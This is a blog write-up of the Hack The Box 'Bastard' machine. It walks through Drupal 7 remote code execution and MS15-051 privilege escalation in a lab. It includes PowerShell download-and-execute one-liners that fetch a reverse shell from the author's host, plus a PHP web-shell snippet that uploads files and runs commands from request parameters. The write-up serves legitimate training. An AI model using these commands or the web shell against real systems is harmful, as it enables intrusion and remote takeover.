Bastard — Hack The Box machine Writeup

c1oud
10 min readNov 2, 2019

--

Welcome to my first blog post and thank you for your interest. I’m going to start blogging a little series of my HTB adventures and some other cyber security sort of things, if there’s one important factor of this field, it’s giving back to the community in any way possible and I thought blogging and going through step-by-step of these machines would be a fantastic way to do so, and to teach those who need a helping hand

NOTE: This box is rated Medium and is one of the OSCP-like machines

Let’s begin!

We start off with the usual nmap scan of :

nmap -sV -A -p- -T4 10.10.10.9

  • sV = Banner grabbing i.e. to find VERSIONS
  • -A = I like to think of this as scanning everything i.e. “all”
  • -p- = Scan all ports
  • -T4 = Speed up nmap to aggressively scan
  • 10.10.10.9 = Target

We can see here we have THREE open ports with it’s service name and version name, too. When it comes to enumeration, versions is super important as this is what we essentially need at most times to look up on google for some exploits or vulnerabilities.

We have common ports open here, nothing out of the ordinary. We’re dealing with a HTTP server and some MSRPC Ports (which aren’t of use to us)

At first glance it’s clear to see we’re dealing with an instance of the Drupal software and it’s running version 7.

We can also see a lot of output from it’s robots.txt file. Good! We already have some useful information straight from our initial recon phase. Let’s check out this website before anything else.

Standard login form page. There wasn’t much to do here apart from try some SQL Injection methods, NoSQL injections, try username enumeration to see if the error messages throw back a “Wrong password” when entering a correct username (which it did return admin to be a correct username)

Next thing I thought of was to check out the robots.txt as mentioned before.

The robots.txt file was quite large, so I eyeballed the directories to see if anything stood out or was interesting to visit, after trying a few with not much to find I decided to visit the CHANGELOG.txt to see if I could get an exact version number this box was running. Here was my finding:

Remember how our Nmap scan told us it was running Drupal 7? Well if we were to search for exploits for Drupal 7, we would find quite a lot, but we want to narrow it down even further to the exact version so we can spend time searching for the exact exploit instead of having a good bunch and trial and error. The most recent update in this changelog was Drupal7.54

Now we have some real findings to play with. After this, I ran the classic dirbuster and nikto. They didn’t find anything useful so I will not include screenshots here.

If you don’t know what these tools mentioned above are, it’s important to know and a quick google search or YouTube search will teach you the knowledge within minutes.

I went straight back to my terminal prompt and searched for exploits for this version. A simple “searchsploit drupal 7.” returned me a list of exploits I could work with, here’s what the output looked like :

Fun Fact: When this box first was released, this exploit list was shorter and the intended exploit was a bit obvious to which one it was

Now this was where I personally ran into some trouble and was getting a tiny bit frustrated. I knew metasploit had the modules to execute from there, so I spent a while trying to execute all of them but with no success for some odd reason. I then went back to searchsploit, looked through the list and picked out the ones it could potentially be. I tried the php ones, the ruby ones but to no avail. I tried running the php script but ran into errors in the compilation, I ran the ruby script with the similar errors and it was just a pain to read through both these scripts and modify what was throwing me errors so I could even run the thing.

My next plan of action was to google and see if anyone had a similar exploit but written in python so I could try that. Luckily, I found this from github:

This actually worked for me and a huge sigh of relief followed through. The purpose of this exploit was to give us back RCE (Remote Code Execution) which we could then leverage to give us a reverse shell which we can see later on — but for now, let’s take a look at how this script operates.

python3 drupal7-CVE-2018–7600.py -c “whoami” http://10.10.10.9

  • Python3 = We use the word python before python scripts to execute them, this script required python3, however.
  • drupal.. = Name of the exploit ( Should have renamed it to something MUCH smaller)
  • -c = The flag used to issue a command in quotation marks
  • http://10.10.10.9 = Target

Success! It returned us nt authority\iusr

My instant plan of action was to get this to connect to a Powershell shell. I used nishang for this and used the Invoke-PowerShellTcp.ps1 script, my command was as follows :

python3 drupa7-CVE-2018–7600.py http://10.10.10.9/ -c “powershell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.16.61:8000/Invoke-PowerShellTcp.ps1')"

Even better! Not only do we have a functioning reverse shell, we have a Powershell prompt which just allows for so much more flexibility and enumeration tools to run.

Let’s not forget the user flag :)

Next stop, ROOT

After I had done my recon for root privilege escalation in my current shell, I realised I had hit a solid rock in my path to root. The root exploit couldn’t run on the box settings i.e the actual specifications of the windows machine wasn’t fit for this exploit to run. I had to actually go back and get the RCE exploit via the intended method so I could run the very last part. I thought I’d just add this in here now instead of later

Enumeration on Windows isn’t my strong point — I much prefer Linux and I assume most do as well, but there are some excellent tools out there to aid and one in particular was Sherlock.

https://github.com/rasta-mouse/Sherlock -> A simple git clone is all that is needed

Let’s run Sherlock on our Powershell prompt to enumerate the machine for us and report to us of any vulnerabilities we can use for Priv Esc — but before this we have to add in a few words in the script itself. Open up Sherlock.ps1 in your preferred text editor and add in this function at the end of the last curly bracket :

}

Find-AllVulns

Now we’re ready to get this running. Go back to where this script is saved in your directory, set up a python http server and let’s download this from our Powershell prompt and execute.

If you’ve set everything up like I said above, a one liner like this will do the trick:

IEX(New-Object Net.WebClient).downloadString(‘http://10.10.16.61:8001/Sherlock.ps1')

After a few moments of being patient, your screen will look like this :

Many are “Not Vulnerable” — and only THREE were “Appears Vulnerable”

I tried MS16–032 but with no luck as the exploit uses a RACE condition and multiple processors if I recall correctly, so the next one to try was MS15–051 which has proven to be successful in the past.

Now this is where the issue came. I couldn’t run this exploit on the current shell, so I had to go back and get the initial RCE the intended way and you’ll understand why when I get to it. (Since the blog is already becoming longer than I anticipated, I’ll speed things up a bit)

Now if we look back at our searchsploit result, there’s one exploit called ‘Module Services — Remote Code Execution’ this is the intended one, so let’s copy this to our /root directory and see what we can do.

NOTE: At the time of release, this was the only available exploit. Now we have drupalgeddon 1,2 and 3. All these exploits actually work if you modify them accordingly — but let’s stick with the intended one for now.

Before we execute this script, we have to do some housekeeping. Make sure you have the latest version of php-curl installed, this can be done by doing “apt-cache search php-curl”. At the time of writing, php-curl7.3 was the latest so I did a quick apt-get install php-curl7.3 to ensure I had the latest version installed. Next, we had to open this script and fix some comment mistakes. Simply execute the script, read the error, go to the line it says the error is on and just delete the comment as it was actually getting interpreted as a piece of code instead of comment. THEN, (almost done) if we read the script, we can see it works with url endpoits aka REST endpoints. I spent time overlooking this and hence why it wasn’t working when I tried this as my first exploit choice. Lets visit http://10.10.10.9/rest ( or curl 10.10.10.9/rest) and see what happens:)

Nice, we’ve set activated the rest_endpoint API function, now we can get onto the FINAL part of execution!

Let’s look at this step by step.

In your script, of course edit the $url to http://10.10.10.9/.

Also, change $endpoint_path to /rest

And last but not least, add in exactly this snippet of code to your script :

$phpCode = <<<’EOD’
<?php
if (isset($_REQUEST[‘fupload’])) {
file_put_contents($_REQUEST[‘fupload’], file_get_contents(“http://10.10.16.61:8000/" . $_REQUEST[‘fupload’]));
};
if (isset($_REQUEST[‘fexec’])) {
echo “<pre>” . shell_exec($_REQUEST[‘fexec’]) . “</pre>”;
};
?>
EOD;

You can see above where I’ve placed it. This is needed to give us not only RCE, but also the ability to upload objects/files to the server. This simply just gives our RCE more flexibility, but it also allows us to execute the MS15–051 exploit from Sherlock.

Don’t forget to add this in also! Change filename to something easy to type

Let’s run this now at long last…

If done correctly, you should have the same output as me here. Excellent! We can navigate to rce.php and get some nice code execution. Not only that, this script managed to get cookie session of the admin and I believe a hashed password for admin. If we wanted to, we could grab this cookie, copy and paste it into BurpSuite in the cookie parameter, forward the request and be logged in as Admin, and from there we can upload a malicious php file and get a reverse shell to our netcat and I THINK it would return as an admin shell — haven’t tried this personally

Anyway, let’s speed things up!

Navigate to this url and input these parameters for RCE to work :

Let’s work on getting root now since we already have a shell from the github script.

MS15–051 , to upload this we have to download this from github, go to:

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051

Make sure to download the .ZIP VERSION.

Unzip this, extract to /root directory the file called ms15–051x64.exe, set up a python -m SimpleHTTPServer again, and follow what I’ve wrote here in my URL :

fupload = What we specified when we added in the snippet to the PHP script

fexec= What we specified in the script to give us RCE

nc64.exe = I downloaded this from github too, and I saved it to my /root directory so the server can grab it from the same port 8000 python HTTPServer. You could do this if you wanted a reverse shell as SYSTEM

We have a SYSTEM shell! Finally, after much modification and trying different exploits we managed to get the root flag in the end.

Honestly, I learned a good ton from this box. I had never used Sherlock before but this box made me use it so that’s something positive to take away. Finding many different exploits and trial and error with them all and some code modification is also something gained! I’ve never tried this nc64.exe trick until now either :)

This wasn’t my first box, but it was the most recent box I had completed and still really fresh in my mind. I hope whoever is reading this, you can take away some important learnings from this and go ahead and try this box for yourself from memory — or even use this guide as motivation to begin your first box.

This blog was way longer than intended, but I think that’s just because I went around the initial foothold a different way :)

Photo by Taskin Ashiq on Unsplash

Thank You!

--

--

c1oud

Penetration Tester ~ OSCP CPSA CRT~